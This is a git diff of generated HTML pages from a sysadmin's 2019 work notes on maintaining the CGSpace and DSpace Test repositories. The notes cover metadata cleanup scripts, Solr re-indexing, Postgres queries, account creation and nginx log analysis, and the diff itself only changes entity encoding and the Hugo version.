$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-16-fix-306-Investors.csv -db dspace-u dspace-p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-16-delete-297-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Then I started a full Discovery re-indexing:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>I was going to make a new controlled vocabulary of the top 100 terms after these corrections, but I noticed a bunch of duplicates and variations when I sorted them alphabetically</li>
<li>Instead, I exported a new list and asked Peter to look at it again</li>
<li>Apply Peter&rsquo;s new corrections on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p 'fuuu' -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p 'fuuu' -m 29 -f dc.description.sponsorship -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-17-fix-25-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29 -t correct -d
$ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dspace -u dspace -p &#39;fuuu&#39; -m 29 -f dc.description.sponsorship -d
</code></pre><ul>
<li>Then I re-exported the sponsors and took the top 100 to update the existing controlled vocabulary (<a href="https://github.com/ilri/DSpace/pull/423">#423</a>)
<ul>
@ -573,16 +573,16 @@ $ ./delete-metadata-values.py -i /tmp/2019-05-17-delete-14-Investors.csv -db dsp
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t corrections -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/2019-05-27-fix-2472-Authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t corrections -d
</code></pre><ul>
<li>Then start a full Discovery re-indexing on each server:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1024m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1024m&#34;
$ time schedtool -B -e ionice -c2 -n7 nice -n19 dspace index-discovery -b
</code></pre><ul>
<li>Export new list of all authors from CGSpace database to send to Peter:</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-05-27-all-authors.csv with csv header;
COPY 64871
</code></pre><ul>
<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
@ -609,7 +609,7 @@ COPY 64871
</code></pre><ul>
<li>For now I just created an eperson with her personal email address until I have time to check LDAP to see what&rsquo;s up with her CGIAR account:</li>
</ul>
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p 'sknflksnfksnfdls'
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Sakshi -s Saini -p &#39;sknflksnfksnfdls&#39;
</code></pre><!-- raw HTML omitted -->

View File

@ -34,7 +34,7 @@ Run system updates on CGSpace (linode18) and reboot it
Skype with Marie-Angélique and Abenet about CG Core v2
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -203,7 +203,7 @@ $ csvcut -l -c 0 /tmp/countries.csv &gt; 2019-06-10-countries.csv
</code></pre><ul>
<li>Get a list of all the unique AGROVOC subject terms in IITA&rsquo;s data and export it to a text file so I can validate them with my <code>agrovoc-lookup.py</code> script:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed 's/||/\n/g' | grep -v dc.subject | sort -u &gt; iita-agrovoc.txt
<pre tabindex="0"><code>$ csvcut -c dc.subject ~/Downloads/2019-06-10-IITA-20194th-Round-2.csv| sed &#39;s/||/\n/g&#39; | grep -v dc.subject | sort -u &gt; iita-agrovoc.txt
$ ./agrovoc-lookup.py -i iita-agrovoc.txt -om iita-agrovoc-matches.txt -or iita-agrovoc-rejects.txt
$ wc -l iita-agrovoc*
402 iita-agrovoc-matches.txt
@ -216,7 +216,7 @@ $ wc -l iita-agrovoc*
</code></pre><ul>
<li>Then make a new list to use with reconcile-csv by adding line numbers with csvcut and changing the line number header to <code>id</code>:</li>
</ul>
<pre tabindex="0"><code>$ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed 's/line_number/id/' &gt; 2019-06-10-subjects-matched.csv
<pre tabindex="0"><code>$ csvcut -c name -l 2019-06-10-subjects-matched.txt | sed &#39;s/line_number/id/&#39; &gt; 2019-06-10-subjects-matched.csv
</code></pre><h2 id="2019-06-20">2019-06-20</h2>
<ul>
<li>Share some feedback about AReS v2 with the colleagues and encourage them to do the same</li>
@ -238,11 +238,11 @@ $ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGR
<ul>
<li>Normalize <code>text_lang</code> values for metadata on DSpace Test and CGSpace:</li>
</ul>
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('ethnob', 'en', '*', 'E.', '');
<pre tabindex="0"><code>dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;ethnob&#39;, &#39;en&#39;, &#39;*&#39;, &#39;E.&#39;, &#39;&#39;);
UPDATE 1551
dspace=# UPDATE metadatavalue SET text_lang='en_US' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IS NULL;
UPDATE 2070
dspace=# UPDATE metadatavalue SET text_lang='es_ES' WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN ('es', 'spa');
dspace=# UPDATE metadatavalue SET text_lang=&#39;es_ES&#39; WHERE resource_type_id=2 AND metadata_field_id != 28 AND text_lang IN (&#39;es&#39;, &#39;spa&#39;);
UPDATE 2
</code></pre><ul>
<li>Upload 202 IITA records from earlier this month (20194th.xls) to CGSpace</li>

View File

@ -38,7 +38,7 @@ CGSpace
Abenet had another similar issue a few days ago when trying to find the stats for 2018 in the RTB community
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -153,13 +153,13 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
</ul>
</li>
</ul>
<pre tabindex="0"><code>org.apache.solr.common.SolrException: Error CREATEing SolrCore 'statistics-2010': Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
<pre tabindex="0"><code>org.apache.solr.common.SolrException: Error CREATEing SolrCore &#39;statistics-2010&#39;: Unable to create core [statistics-2010] Caused by: Lock obtain timed out: NativeFSLock@/home/cgspace.cgiar.org/solr/statistics-2010/data/index/write.lock
</code></pre><ul>
<li>I restarted Tomcat <em>ten times</em> and it never worked&hellip;</li>
<li>I tried to stop Tomcat and delete the write locks:</li>
</ul>
<pre tabindex="0"><code># systemctl stop tomcat7
# find /dspace/solr/statistics* -iname &quot;*.lock&quot; -print -delete
# find /dspace/solr/statistics* -iname &#34;*.lock&#34; -print -delete
/dspace/solr/statistics/data/index/write.lock
/dspace/solr/statistics-2010/data/index/write.lock
/dspace/solr/statistics-2011/data/index/write.lock
@ -170,7 +170,7 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
/dspace/solr/statistics-2016/data/index/write.lock
/dspace/solr/statistics-2017/data/index/write.lock
/dspace/solr/statistics-2018/data/index/write.lock
# find /dspace/solr/statistics* -iname &quot;*.lock&quot; -print -delete
# find /dspace/solr/statistics* -iname &#34;*.lock&#34; -print -delete
# systemctl start tomcat7
</code></pre><ul>
<li>But it still didn&rsquo;t work!</li>
@ -221,8 +221,8 @@ Abenet had another similar issue a few days ago when trying to find the stats fo
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ sed -i 's/CC-BY 4.0/CC-BY-4.0/' item_*/dublin_core.xml
$ echo &quot;10568/101992&quot; &gt;&gt; item_*/collections
<pre tabindex="0"><code>$ sed -i &#39;s/CC-BY 4.0/CC-BY-4.0/&#39; item_*/dublin_core.xml
$ echo &#34;10568/101992&#34; &gt;&gt; item_*/collections
$ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair_mapped
</code></pre><ul>
<li>I noticed that all twenty-seven items had double dates like &ldquo;2019-05||2019-05&rdquo; so I fixed those, but the rest of the metadata looked good so I unmapped them from the temporary collection</li>
@ -249,20 +249,20 @@ $ dspace import -a -e me@cgiar.org -m 2019-07-02-Sharefair.map -s /tmp/Sharefair
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE '[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}' | sort -u &gt; /tmp/2019-07-04-orcid-ids.txt
<pre tabindex="0"><code>$ cat dspace/config/controlled-vocabularies/cg-creator-id.xml /tmp/new-bioversity-orcids.txt | grep -oE &#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39; | sort -u &gt; /tmp/2019-07-04-orcid-ids.txt
$ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names.txt -d
</code></pre><ul>
<li>Send and merge a pull request for the new ORCID identifiers (<a href="https://github.com/ilri/DSpace/pull/428">#428</a>)</li>
<li>I created a CSV with some ORCID identifiers that I had seen change so I could update any existing ones in the databse:</li>
</ul>
<pre tabindex="0"><code>cg.creator.id,correct
&quot;Marius Ekué: 0000-0002-5829-6321&quot;,&quot;Marius R.M. Ekué: 0000-0002-5829-6321&quot;
&quot;Mwungu: 0000-0001-6181-8445&quot;,&quot;Chris Miyinzi Mwungu: 0000-0001-6181-8445&quot;
&quot;Mwungu: 0000-0003-1658-287X&quot;,&quot;Chris Miyinzi Mwungu: 0000-0003-1658-287X&quot;
&#34;Marius Ekué: 0000-0002-5829-6321&#34;,&#34;Marius R.M. Ekué: 0000-0002-5829-6321&#34;
&#34;Mwungu: 0000-0001-6181-8445&#34;,&#34;Chris Miyinzi Mwungu: 0000-0001-6181-8445&#34;
&#34;Mwungu: 0000-0003-1658-287X&#34;,&#34;Chris Miyinzi Mwungu: 0000-0003-1658-287X&#34;
</code></pre><ul>
<li>But when I ran <code>fix-metadata-values.py</code> I didn&rsquo;t see any changes:</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p 'fuuu' -f cg.creator.id -m 240 -t correct -d
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2019-07-04-update-orcids.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.creator.id -m 240 -t correct -d
</code></pre><h2 id="2019-07-06">2019-07-06</h2>
<ul>
<li>Send a reminder to Marie about my notes on the <a href="https://github.com/AgriculturalSemantics/cg-core/issues/2">CG Core v2 issue I created two weeks ago</a></li>
@ -282,22 +282,22 @@ $ ./resolve-orcids.py -i /tmp/2019-07-04-orcid-ids.txt -o 2019-07-04-orcid-names
</li>
<li>Playing with the idea of using <a href="https://github.com/BurntSushi/xsv">xsv</a> to do some basic batch quality checks on CSVs, for example to find items that might be duplicates if they have the same DOI or title:</li>
</ul>
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;,1&#39;
field,value,count
cg.identifier.doi,https://doi.org/10.1016/j.agwat.2018.06.018,2
$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E ',1'
$ xsv frequency --select dc.title --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;,1&#39;
field,value,count
dc.title,Reference evapotranspiration prediction using hybridized fuzzy model with firefly algorithm: Regional case study in Burkina Faso,2
</code></pre><ul>
<li>Or perhaps if DOIs are valid or not (having doi.org in the URL):</li>
</ul>
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E 'doi.org'
<pre tabindex="0"><code>$ xsv frequency --select cg.identifier.doi --no-nulls cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v -E &#39;doi.org&#39;
field,value,count
cg.identifier.doi,https://hdl.handle.net/10520/EJC-1236ac700f,1
</code></pre><ul>
<li>Or perhaps items with invalid ISSNs (according to the <a href="https://en.wikipedia.org/wiki/International_Standard_Serial_Number#Code_format">ISSN code format</a>):</li>
</ul>
<pre tabindex="0"><code>$ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v '&quot;' | grep -v -E '^[0-9]{4}-[0-9]{3}[0-9xX]$'
<pre tabindex="0"><code>$ xsv select dc.identifier.issn cgspace_metadata_africaRice-11to73_ay_id.csv | grep -v &#39;&#34;&#39; | grep -v -E &#39;^[0-9]{4}-[0-9]{3}[0-9xX]$&#39;
dc.identifier.issn
978-3-319-71997-9
978-3-319-71997-9
@ -350,13 +350,13 @@ dc.identifier.issn
<li>Run all system updates on DSpace Test (linode19) and reboot it</li>
<li>Try to run <code>dspace cleanup -v</code> on CGSpace and ran into an error:</li>
</ul>
<pre tabindex="0"><code>Error: ERROR: update or delete on table &quot;bitstream&quot; violates foreign key constraint &quot;bundle_primary_bitstream_id_fkey&quot; on table &quot;bundle&quot;
Detail: Key (bitstream_id)=(167394) is still referenced from table &quot;bundle&quot;.
<pre tabindex="0"><code>Error: ERROR: update or delete on table &#34;bitstream&#34; violates foreign key constraint &#34;bundle_primary_bitstream_id_fkey&#34; on table &#34;bundle&#34;
Detail: Key (bitstream_id)=(167394) is still referenced from table &#34;bundle&#34;.
</code></pre><ul>
<li>The solution is, as always:</li>
</ul>
<pre tabindex="0"><code># su - postgres
$ psql dspace -c 'update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);'
$ psql dspace -c &#39;update bundle set primary_bitstream_id=NULL where primary_bitstream_id in (167394);&#39;
UPDATE 1
</code></pre><h2 id="2019-07-16">2019-07-16</h2>
<ul>
@ -371,9 +371,9 @@ $ sudo rm -rf ~/.local/share/containers
$ podman run --name dspacedb -v dspacedb_data:/var/lib/postgresql/data -e POSTGRES_PASSWORD=postgres -p 5432:5432 -d postgres:9.6-alpine
$ createuser -h localhost -U postgres --pwprompt dspacetest
$ createdb -h localhost -U postgres -O dspacetest --encoding=UNICODE dspacetest
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest superuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest superuser;&#39;
$ pg_restore -h localhost -U postgres -d dspacetest -O --role=dspacetest -h localhost ~/Downloads/cgspace_2019-07-16.backup
$ psql -h localhost -U postgres dspacetest -c 'alter user dspacetest nosuperuser;'
$ psql -h localhost -U postgres dspacetest -c &#39;alter user dspacetest nosuperuser;&#39;
$ psql -h localhost -U postgres -f ~/src/git/DSpace/dspace/etc/postgres/update-sequences.sql dspacetest
</code></pre><ul>
<li>Start working on implementing the <a href="https://gist.github.com/alanorth/2db39e91f48d116e00a4edffd6ba6409">CG Core v2 changes</a> on my local DSpace test environment</li>
@ -414,7 +414,7 @@ Please see the DSpace documentation for assistance.
<ul>
<li>Create an account for Lionelle Samnick on CGSpace because the registration isn&rsquo;t working for some reason:</li>
</ul>
<pre tabindex="0"><code>$ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password 'blah'
<pre tabindex="0"><code>$ dspace user --add --givenname Lionelle --surname Samnick --email blah@blah.com --password &#39;blah&#39;
</code></pre><ul>
<li>I added her as a submitter to <a href="https://cgspace.cgiar.org/handle/10568/74536">CTA ISF Pro-Agro series</a></li>
<li>Start looking at 1429 records for the Bioversity batch import
@ -484,18 +484,18 @@ Please see the DSpace documentation for assistance.
<p>I might be able to use <a href="https://pypi.org/project/isbnlib/">isbnlib</a> to validate ISBNs in Python:</p>
</li>
</ul>
<pre tabindex="0"><code>if isbnlib.is_isbn10('9966-955-07-0') or isbnlib.is_isbn13('9966-955-07-0'):
print(&quot;Yes&quot;)
<pre tabindex="0"><code>if isbnlib.is_isbn10(&#39;9966-955-07-0&#39;) or isbnlib.is_isbn13(&#39;9966-955-07-0&#39;):
print(&#34;Yes&#34;)
else:
print(&quot;No&quot;)
print(&#34;No&#34;)
</code></pre><ul>
<li>Or with <a href="https://github.com/arthurdejong/python-stdnum">python-stdnum</a>:</li>
</ul>
<pre tabindex="0"><code>from stdnum import isbn
from stdnum import issn
isbn.validate('978-92-9043-389-7')
issn.validate('1020-3362')
isbn.validate(&#39;978-92-9043-389-7&#39;)
issn.validate(&#39;1020-3362&#39;)
</code></pre><h2 id="2019-07-26">2019-07-26</h2>
<ul>
<li>
@ -510,7 +510,7 @@ issn.validate('1020-3362')
<p>I figured out a GREL to trim spaces in multi-value cells without splitting them:</p>
</li>
</ul>
<pre tabindex="0"><code>value.replace(/\s+\|\|/,&quot;||&quot;).replace(/\|\|\s+/,&quot;||&quot;)
<pre tabindex="0"><code>value.replace(/\s+\|\|/,&#34;||&#34;).replace(/\|\|\s+/,&#34;||&#34;)
</code></pre><ul>
<li>I whipped up a quick script using Python Pandas to do whitespace cleanup</li>
</ul>

View File

@ -46,7 +46,7 @@ After rebooting, all statistics cores were loaded&hellip; wow, that&rsquo;s luck
Run system updates on DSpace Test (linode19) and reboot it
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -235,7 +235,7 @@ Run system updates on DSpace Test (linode19) and reboot it
</ul>
</li>
</ul>
<pre tabindex="0"><code># /opt/certbot-auto renew --standalone --pre-hook &quot;/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld&quot; --post-hook &quot;/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx&quot;
<pre tabindex="0"><code># /opt/certbot-auto renew --standalone --pre-hook &#34;/usr/bin/docker stop angular_nginx; /bin/systemctl stop firewalld&#34; --post-hook &#34;/bin/systemctl start firewalld; /usr/bin/docker start angular_nginx&#34;
</code></pre><ul>
<li>It is important that the firewall starts back up before the Docker container or else Docker will complain about missing iptables chains</li>
<li>Also, I updated to the latest TLS Intermediate settings as appropriate for Ubuntu 18.04&rsquo;s <a href="https://ssl-config.mozilla.org/#server=nginx&amp;server-version=1.16.0&amp;config=intermediate&amp;openssl-version=1.1.0g&amp;hsts=false&amp;ocsp=false">OpenSSL 1.1.0g with nginx 1.16.0</a></li>
@ -243,9 +243,9 @@ Run system updates on DSpace Test (linode19) and reboot it
<li>Get a list of all PDFs from the Bioversity migration that fail to download and save them so I can try again with a different path in the URL:</li>
</ul>
<pre tabindex="0"><code>$ ./generate-thumbnails.py -i /tmp/2019-08-05-Bioversity-Migration.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs.txt
$ grep -B1 &quot;Download failed&quot; /tmp/2019-08-08-download-pdfs.txt | grep &quot;Downloading&quot; | sed -e 's/&gt; Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 &gt; /tmp/user-upload.csv
$ grep -B1 &#34;Download failed&#34; /tmp/2019-08-08-download-pdfs.txt | grep &#34;Downloading&#34; | sed -e &#39;s/&gt; Downloading //&#39; -e &#39;s/\.\.\.//&#39; | sed -r &#39;s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g&#39; | csvcut -H -c 1,1 &gt; /tmp/user-upload.csv
$ ./generate-thumbnails.py -i /tmp/user-upload.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs2.txt
$ grep -B1 &quot;Download failed&quot; /tmp/2019-08-08-download-pdfs2.txt | grep &quot;Downloading&quot; | sed -e 's/&gt; Downloading //' -e 's/\.\.\.//' | sed -r 's/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g' | csvcut -H -c 1,1 &gt; /tmp/user-upload2.csv
$ grep -B1 &#34;Download failed&#34; /tmp/2019-08-08-download-pdfs2.txt | grep &#34;Downloading&#34; | sed -e &#39;s/&gt; Downloading //&#39; -e &#39;s/\.\.\.//&#39; | sed -r &#39;s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g&#39; | csvcut -H -c 1,1 &gt; /tmp/user-upload2.csv
$ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d | tee /tmp/2019-08-08-download-pdfs3.txt
</code></pre><ul>
<li>
@ -329,7 +329,7 @@ $ ./generate-thumbnails.py -i /tmp/user-upload2.csv -w --url-field-name url -d |
<ul>
<li>Create a test user on DSpace Test for Mohammad Salem to attempt depositing:</li>
</ul>
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p 'domoamaaa'
<pre tabindex="0"><code>$ dspace user -a -m blah@blah.com -g Mohammad -s Salem -p &#39;domoamaaa&#39;
</code></pre><ul>
<li>Create and merge a pull request (<a href="https://github.com/ilri/DSpace/pull/429">#429</a>) to add eleven new CCAFS Phase II Project Tags to CGSpace</li>
<li>Atmire responded to the <a href="https://tracker.atmire.com/tickets-cgiar-ilri/view-ticket?id=685">Solr cores issue</a> last week, but they could not reproduce the issue
@ -345,7 +345,7 @@ java.lang.OutOfMemoryError: GC overhead limit exceeded
</code></pre><ul>
<li>I increased the heap size to 1536m and tried again:</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS=&quot;-Dfile.encoding=UTF-8 -Xmx1536m&quot;
<pre tabindex="0"><code>$ export JAVA_OPTS=&#34;-Dfile.encoding=UTF-8 -Xmx1536m&#34;
$ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
</code></pre><ul>
<li>This time it succeeded, and using VisualVM I noticed that the import process used a maximum of 620MB of RAM</li>
@ -361,7 +361,7 @@ $ ~/dspace/bin/dspace metadata-import -f /tmp/bioversity.csv -e blah@blah.com
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx512m'
<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx512m&#39;
$ dspace metadata-import -f /tmp/bioversity1.csv -e blah@blah.com
$ dspace metadata-import -f /tmp/bioversity2.csv -e blah@blah.com
</code></pre><ul>
@ -429,7 +429,7 @@ return os.path.basename(value)
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correct
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i ~/Downloads/2019-08-26-Peter-authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correct
</code></pre><ul>
<li>Apply the corrections on CGSpace and DSpace Test
<ul>
@ -478,7 +478,7 @@ sys 2m24.715s
</ul>
</li>
</ul>
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
<pre tabindex="0"><code>dspace=# \copy (select distinct text_value, count(*) as count from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 group by text_value order by count desc) to /tmp/2019-08-28-all-authors.csv with csv header;
COPY 65597
</code></pre><ul>
<li>Then I created a new CSV with two author columns (edit title of second column after):</li>
@ -492,7 +492,7 @@ COPY 65597
<li>This fixed a bunch of issues with spaces, commas, unneccesary Unicode characters, etc</li>
<li>Then I ran the corrections on my test server and there were 185 of them!</li>
</ul>
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p 'fuuu' -f dc.contributor.author -m 3 -t correctauthor
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.contributor.author -m 3 -t correctauthor
</code></pre><ul>
<li>I very well might run these on CGSpace soon&hellip;</li>
</ul>
@ -506,7 +506,7 @@ COPY 65597
</ul>
</li>
</ul>
<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &quot;*.xsl&quot; -exec ./cgcore-xsl-replacements.sed {} \;
<pre tabindex="0"><code>$ find dspace/modules/xmlui-mirage2/src/main/webapp/themes -iname &#34;*.xsl&#34; -exec ./cgcore-xsl-replacements.sed {} \;
</code></pre><ul>
<li>I think I got everything in the XMLUI themes, but there may be some things I should check once I get a deployment up and running:
<ul>
@ -526,7 +526,7 @@ COPY 65597
</ul>
</li>
</ul>
<pre tabindex="0"><code>&quot;handles&quot;:[&quot;10986/30568&quot;,&quot;10568/97825&quot;],&quot;handle&quot;:&quot;10986/30568&quot;
<pre tabindex="0"><code>&#34;handles&#34;:[&#34;10986/30568&#34;,&#34;10568/97825&#34;],&#34;handle&#34;:&#34;10986/30568&#34;
</code></pre><ul>
<li>So this is the same issue we had before, where Altmetric <em>knows</em> this Handle is associated with a DOI that has a score, but the client-side JavaScript code doesn&rsquo;t show it because it seems to a secondary handle or something</li>
</ul>

View File

@ -12,7 +12,7 @@
Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -23,7 +23,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
@ -49,7 +49,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
Linode emailed to say that CGSpace (linode18) had a high rate of outbound traffic for several hours this morning
Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/access.log /var/log/nginx/access.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
440 17.58.101.255
441 157.55.39.101
485 207.46.13.43
@ -60,7 +60,7 @@ Here are the top ten IPs in the nginx XMLUI and REST/OAI logs this morning:
814 207.46.13.212
2472 163.172.71.23
6092 3.94.211.189
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &quot;01/Sep/2019:0&quot; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
# zcat --force /var/log/nginx/rest.log /var/log/nginx/rest.log.1 /var/log/nginx/oai.log /var/log/nginx/oai.log.1 | grep -E &#34;01/Sep/2019:0&#34; | awk &#39;{print $1}&#39; | sort | uniq -c | sort -n | tail -n 10
33 2a01:7e00::f03c:91ff:fe16:fcb
57 3.83.192.124
57 3.87.77.25
